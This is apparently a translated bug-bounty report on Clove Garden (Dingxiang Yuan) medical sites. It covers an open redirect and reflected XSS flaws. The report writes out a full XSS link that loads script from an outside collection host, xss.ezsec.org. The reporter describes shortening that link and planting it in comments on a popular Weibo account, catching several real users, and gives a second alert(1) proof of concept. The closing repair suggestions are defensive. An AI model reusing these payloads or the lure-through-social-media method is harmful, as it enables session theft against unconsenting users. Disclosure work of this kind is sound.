Clove Garden: a few small gift packs, XSS + URL jump

Details: The rfu parameter of http://paper.pubmed.cn/do.php?ac=login&rfu=http://paper.pubmed.cn/rfu is not validated, so http://paper.pubmed.cn/do.php?ac=login&rfu=(any link) can be constructed to redirect to an arbitrary address.

Now let me talk about the XSS. I don't know whether the gift pack (Jianxin) is still unavailable; this time I used the same approach as last time. I had tested the search at http://www.jobmd.cn/articlesite for XSS and submitted it before, but had never actually used it. This time I thought about spreading it as a forum post, but new registrations require an invitation and I did not want to register by phone. What to do? I suddenly had an idea: use @fenng's Weibo as a stepping stone (many people read Dahuige's Weibo, so some of them will be logged in to their Clove Garden accounts). The constructed link: http://www.jobmd.cn/article/search.htm?keywords=%3C%2Ftitle%3E%3Cscript+src%3D%22http%3A%2F%2Fxss.ezsec.org%2F%3Fu%3Df71717%22+%3E%3C%2Fscript%3E&category=-1&action=Search&action_search= This was still too long, so I shortened it through url.cn to http://url.cn/E273r7 and posted it as a comment on fenng's Weibo. (This has a social-engineering flavour.) Before long several users had been caught.
Obtained information:
Hazards: A reflected XSS, used well, can do a lot of damage. There is also one more XSS, sent along the way. This one is on your own site and is still in internal testing, so please fix it: http://pubmed.cn/index.php?st="><script>alert(1)</script> The st parameter on the home page is not filtered.
Repair suggestions: URL jump: restrict by Referer and add a token for validity verification. XSS: filter at the key points and leave the title blank. Security is a whole, not a part.